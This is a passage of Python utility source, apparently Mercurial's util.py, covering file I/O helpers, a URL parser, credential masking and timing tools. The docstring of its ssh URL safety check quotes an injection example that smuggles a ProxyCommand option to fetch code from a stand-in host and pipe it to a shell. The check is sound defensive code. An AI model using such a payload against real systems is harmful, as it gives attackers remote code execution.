def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If the size parameter is omitted, read everything."""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of the unconsumed part of the chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

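# Illustrative usage (editorial sketch, not part of the module):
# re-chunk a stream of unevenly sized pieces into fixed-size reads.
#
#   buf = chunkbuffer(iter([b'ab', b'cdefg', b'h']))
#   buf.read(4)   # -> b'abcd'
#   buf.read(4)   # -> b'efgh'
#   buf.read(4)   # -> b'' once the iterator runs dry
#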
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

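# Illustrative usage (editorial sketch, not part of the module): copy a
# file in bounded chunks so memory use stays flat regardless of file
# size. The file names are hypothetical.
#
#   with open(b'src', 'rb') as ifp, open(b'dst', 'wb') as ofp:
#       for chunk in filechunkiter(ifp, size=65536):
#           ofp.write(chunk)
#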
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

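# Illustrative usage (editorial sketch, not part of the module): confine
# a consumer to one length-prefixed frame of a stream so it cannot read
# into the next frame. ``fh`` and ``framelength`` are hypothetical.
#
#   body = cappedreader(fh, framelength)
#   while True:
#       piece = body.read(4096)
#       if not piece:
#           break   # EOF at the frame boundary, not the stream's end
#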
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

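# Illustrative values (editorial sketch, not part of the module): the
# first row whose threshold (multiplier * divisor) the value reaches
# wins, so displayed precision drops as magnitude grows.
#
#   bytecount(500)          # -> '500 bytes'
#   bytecount(1536)         # -> '1.50 KB'  (the (1, 1 << 10) row)
#   bytecount(100 * 1024)   # -> '100 KB'   (the (100, 1 << 10) row)
#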
class transformingwriter(object):
    """Writable file wrapper that transforms data with a function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL, which can be either a CRLF (repeated CRs are
# collapsed) or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

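# Illustrative usage (editorial sketch, not part of the module):
#
#   tolf(b'a\r\nb\r\r\nc\n')    # -> b'a\nb\nc\n'
#   tocrlf(b'a\nb\r\n')         # -> b'a\r\nb\r\n'
#
#   # wrap an output stream so every write uses native EOLs;
#   # ``out`` is a hypothetical binary file object
#   w = nativeeolwriter(out)
#   w.write(b'one\ntwo\n')
#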
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we work around the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can work around the EINTR issue for fp.__iter__, it is
    # slower: "for x in fp" is 4x faster than "for x in iter(fp.readline, '')"
    # in CPython 2, because CPython 2 maintains an internal readahead buffer
    # for fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue, thus no workaround is
    # needed.
    def iterfile(fp):
        return fp

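# Illustrative usage (editorial sketch, not part of the module): iterate
# over a pipe safely. On buggy CPython 2 versions, a signal arriving
# mid-read could otherwise surface as an EINTR error from
# ``for line in fp``. ``proc`` is a hypothetical
# subprocess.Popen(..., stdout=subprocess.PIPE) handle.
#
#   for line in iterfile(proc.stdout):
#       ...
#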
def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows escaping the prefix by
    doubling it.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

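# Illustrative usage (editorial sketch, not part of the module): simple
# %-style template expansion, with '%%' escaping enabled via
# escape_prefix (hence the two-character, regexp-escaped prefix).
#
#   interpolate(br'\%', {b'user': b'alice'}, b'hi %user, 100%% sure',
#               escape_prefix=True)
#   # -> b'hi alice, 100% sure'
#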
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

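# Illustrative usage (editorial sketch, not part of the module):
#
#   getport(8080)       # -> 8080
#   getport(b'8080')    # -> 8080 (int() accepts the string form)
#   getport(b'https')   # -> 443 on typical systems, via getservbyname()
#   getport(b'no-such-service')   # raises error.Abort
#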
2634 class url(object):
2635 class url(object):
2635 r"""Reliable URL parser.
2636 r"""Reliable URL parser.
2636
2637
2637 This parses URLs and provides attributes for the following
2638 This parses URLs and provides attributes for the following
2638 components:
2639 components:
2639
2640
2640 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641
2642
2642 Missing components are set to None. The only exception is
2643 Missing components are set to None. The only exception is
2643 fragment, which is set to '' if present but empty.
2644 fragment, which is set to '' if present but empty.
2644
2645
2645 If parsefragment is False, fragment is included in query. If
2646 If parsefragment is False, fragment is included in query. If
2646 parsequery is False, query is included in path. If both are
2647 parsequery is False, query is included in path. If both are
2647 False, both fragment and query are included in path.
2648 False, both fragment and query are included in path.
2648
2649
2649 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650
2651
2651 Note that for backward compatibility reasons, bundle URLs do not
2652 Note that for backward compatibility reasons, bundle URLs do not
2652 take host names. That means 'bundle://../' has a path of '../'.
2653 take host names. That means 'bundle://../' has a path of '../'.
2653
2654
2654 Examples:
2655 Examples:
2655
2656
2656 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 >>> url(b'file:///home/joe/repo')
2661 >>> url(b'file:///home/joe/repo')
2661 <url scheme: 'file', path: '/home/joe/repo'>
2662 <url scheme: 'file', path: '/home/joe/repo'>
2662 >>> url(b'file:///c:/temp/foo/')
2663 >>> url(b'file:///c:/temp/foo/')
2663 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 >>> url(b'bundle:foo')
2665 >>> url(b'bundle:foo')
2665 <url scheme: 'bundle', path: 'foo'>
2666 <url scheme: 'bundle', path: 'foo'>
2666 >>> url(b'bundle://../foo')
2667 >>> url(b'bundle://../foo')
2667 <url scheme: 'bundle', path: '../foo'>
2668 <url scheme: 'bundle', path: '../foo'>
2668 >>> url(br'c:\foo\bar')
2669 >>> url(br'c:\foo\bar')
2669 <url path: 'c:\\foo\\bar'>
2670 <url path: 'c:\\foo\\bar'>
2670 >>> url(br'\\blah\blah\blah')
2671 >>> url(br'\\blah\blah\blah')
2671 <url path: '\\\\blah\\blah\\blah'>
2672 <url path: '\\\\blah\\blah\\blah'>
2672 >>> url(br'\\blah\blah\blah#baz')
2673 >>> url(br'\\blah\blah\blah#baz')
2673 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 >>> url(br'file:///C:\users\me')
2675 >>> url(br'file:///C:\users\me')
2675 <url scheme: 'file', path: 'C:\\users\\me'>
2676 <url scheme: 'file', path: 'C:\\users\\me'>
2676
2677
2677 Authentication credentials:
2678 Authentication credentials:
2678
2679
2679 >>> url(b'ssh://joe:xyz@x/repo')
2680 >>> url(b'ssh://joe:xyz@x/repo')
2680 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 >>> url(b'ssh://joe@x/repo')
2682 >>> url(b'ssh://joe@x/repo')
2682 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683
2684
2684 Query strings and fragments:
2685 Query strings and fragments:
2685
2686
2686 >>> url(b'http://host/a?b#c')
2687 >>> url(b'http://host/a?b#c')
2687 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690
2691
2691 Empty path:
2692 Empty path:
2692
2693
2693 >>> url(b'')
2694 >>> url(b'')
2694 <url path: ''>
2695 <url path: ''>
2695 >>> url(b'#a')
2696 >>> url(b'#a')
2696 <url path: '', fragment: 'a'>
2697 <url path: '', fragment: 'a'>
2697 >>> url(b'http://host/')
2698 >>> url(b'http://host/')
2698 <url scheme: 'http', host: 'host', path: ''>
2699 <url scheme: 'http', host: 'host', path: ''>
2699 >>> url(b'http://host/#a')
2700 >>> url(b'http://host/#a')
2700 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701
2702
2702 Only scheme:
2703 Only scheme:
2703
2704
2704 >>> url(b'http:')
2705 >>> url(b'http:')
2705 <url scheme: 'http'>
2706 <url scheme: 'http'>
2706 """
2707 """
2707
2708
2708 _safechars = "!~*'()+"
2709 _safechars = "!~*'()+"
2709 _safepchars = "/!~*'()+:\\"
2710 _safepchars = "/!~*'()+:\\"
2710 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711
2712
2712 def __init__(self, path, parsequery=True, parsefragment=True):
2713 def __init__(self, path, parsequery=True, parsefragment=True):
2713 # We slowly chomp away at path until we have only the path left
2714 # We slowly chomp away at path until we have only the path left
2714 self.scheme = self.user = self.passwd = self.host = None
2715 self.scheme = self.user = self.passwd = self.host = None
2715 self.port = self.path = self.query = self.fragment = None
2716 self.port = self.path = self.query = self.fragment = None
2716 self._localpath = True
2717 self._localpath = True
2717 self._hostport = ''
2718 self._hostport = ''
2718 self._origpath = path
2719 self._origpath = path
2719
2720
2720 if parsefragment and '#' in path:
2721 if parsefragment and '#' in path:
2721 path, self.fragment = path.split('#', 1)
2722 path, self.fragment = path.split('#', 1)
2722
2723
2723 # special case for Windows drive letters and UNC paths
2724 # special case for Windows drive letters and UNC paths
2724 if hasdriveletter(path) or path.startswith('\\\\'):
2725 if hasdriveletter(path) or path.startswith('\\\\'):
2725 self.path = path
2726 self.path = path
2726 return
2727 return
2727
2728
2728 # For compatibility reasons, we can't handle bundle paths as
2729 # For compatibility reasons, we can't handle bundle paths as
2729 # normal URLS
2730 # normal URLS
2730 if path.startswith('bundle:'):
2731 if path.startswith('bundle:'):
2731 self.scheme = 'bundle'
2732 self.scheme = 'bundle'
2732 path = path[7:]
2733 path = path[7:]
2733 if path.startswith('//'):
2734 if path.startswith('//'):
2734 path = path[2:]
2735 path = path[2:]
2735 self.path = path
2736 self.path = path
2736 return
2737 return
2737
2738
2738 if self._matchscheme(path):
2739 if self._matchscheme(path):
2739 parts = path.split(':', 1)
2740 parts = path.split(':', 1)
2740 if parts[0]:
2741 if parts[0]:
2741 self.scheme, path = parts
2742 self.scheme, path = parts
2742 self._localpath = False
2743 self._localpath = False
2743
2744
2744 if not path:
2745 if not path:
2745 path = None
2746 path = None
2746 if self._localpath:
2747 if self._localpath:
2747 self.path = ''
2748 self.path = ''
2748 return
2749 return
2749 else:
2750 else:
2750 if self._localpath:
2751 if self._localpath:
2751 self.path = path
2752 self.path = path
2752 return
2753 return
2753
2754
2754 if parsequery and '?' in path:
2755 if parsequery and '?' in path:
2755 path, self.query = path.split('?', 1)
2756 path, self.query = path.split('?', 1)
2756 if not path:
2757 if not path:
2757 path = None
2758 path = None
2758 if not self.query:
2759 if not self.query:
2759 self.query = None
2760 self.query = None
2760
2761
2761 # // is required to specify a host/authority
2762 # // is required to specify a host/authority
2762 if path and path.startswith('//'):
2763 if path and path.startswith('//'):
2763 parts = path[2:].split('/', 1)
2764 parts = path[2:].split('/', 1)
2764 if len(parts) > 1:
2765 if len(parts) > 1:
2765 self.host, path = parts
2766 self.host, path = parts
2766 else:
2767 else:
2767 self.host = parts[0]
2768 self.host = parts[0]
2768 path = None
2769 path = None
2769 if not self.host:
2770 if not self.host:
2770 self.host = None
2771 self.host = None
2771 # path of file:///d is /d
2772 # path of file:///d is /d
2772 # path of file:///d:/ is d:/, not /d:/
2773 # path of file:///d:/ is d:/, not /d:/
2773 if path and not hasdriveletter(path):
2774 if path and not hasdriveletter(path):
2774 path = '/' + path
2775 path = '/' + path
2775
2776
2776 if self.host and '@' in self.host:
2777 if self.host and '@' in self.host:
2777 self.user, self.host = self.host.rsplit('@', 1)
2778 self.user, self.host = self.host.rsplit('@', 1)
2778 if ':' in self.user:
2779 if ':' in self.user:
2779 self.user, self.passwd = self.user.split(':', 1)
2780 self.user, self.passwd = self.user.split(':', 1)
2780 if not self.host:
2781 if not self.host:
2781 self.host = None
2782 self.host = None
2782
2783
2783 # Don't split on colons in IPv6 addresses without ports
2784 # Don't split on colons in IPv6 addresses without ports
2784 if (self.host and ':' in self.host and
2785 if (self.host and ':' in self.host and
2785 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 self._hostport = self.host
2787 self._hostport = self.host
2787 self.host, self.port = self.host.rsplit(':', 1)
2788 self.host, self.port = self.host.rsplit(':', 1)
2788 if not self.host:
2789 if not self.host:
2789 self.host = None
2790 self.host = None
2790
2791
2791 if (self.host and self.scheme == 'file' and
2792 if (self.host and self.scheme == 'file' and
2792 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794
2795
2795 self.path = path
2796 self.path = path
2796
2797
2797 # leave the query string escaped
2798 # leave the query string escaped
2798 for a in ('user', 'passwd', 'host', 'port',
2799 for a in ('user', 'passwd', 'host', 'port',
2799 'path', 'fragment'):
2800 'path', 'fragment'):
2800 v = getattr(self, a)
2801 v = getattr(self, a)
2801 if v is not None:
2802 if v is not None:
2802 setattr(self, a, urlreq.unquote(v))
2803 setattr(self, a, urlreq.unquote(v))
2803
2804
2804 @encoding.strmethod
2805 @encoding.strmethod
2805 def __repr__(self):
2806 def __repr__(self):
2806 attrs = []
2807 attrs = []
2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 'query', 'fragment'):
2809 'query', 'fragment'):
2809 v = getattr(self, a)
2810 v = getattr(self, a)
2810 if v is not None:
2811 if v is not None:
2811 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 return '<url %s>' % ', '.join(attrs)
2813 return '<url %s>' % ', '.join(attrs)
2813
2814
2814 def __bytes__(self):
2815 def __bytes__(self):
2815 r"""Join the URL's components back into a URL string.
2816 r"""Join the URL's components back into a URL string.
2816
2817
2817 Examples:
2818 Examples:
2818
2819
2819 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 'http://user:pw@host:80/?foo=bar&baz=42'
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

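    # Editor's note: an illustrative sketch, not part of util.py, of how a
    # caller might feed authinfo() into a urllib2-style password manager.
    # 'passmgr' and the surrounding setup are hypothetical.
    #
    #   u = url(b'http://user:pw@example.com/repo')
    #   saferurl, authdata = u.authinfo()
    #   if authdata is not None:
    #       realm, uris, user, passwd = authdata
    #       passmgr.add_password(realm, uris, user, passwd)
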
    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

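# Editor's note: illustrative examples, not part of util.py.
#
#   hasscheme(b'http://example.com/repo')   -> True
#   hasscheme(b'/tmp/repo')                 -> False
#   hasdriveletter(b'c:\\tmp')              -> True
#   hasdriveletter(b'/tmp')                 -> False
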
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

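# Editor's note: illustrative examples, not part of util.py.
#
#   hidepassword(b'http://user:secret@example.com/repo')
#       -> 'http://user:***@example.com/repo'
#   removeauth(b'http://user:secret@example.com/repo')
#       -> 'http://example.com/repo'
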
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution are
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering, a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
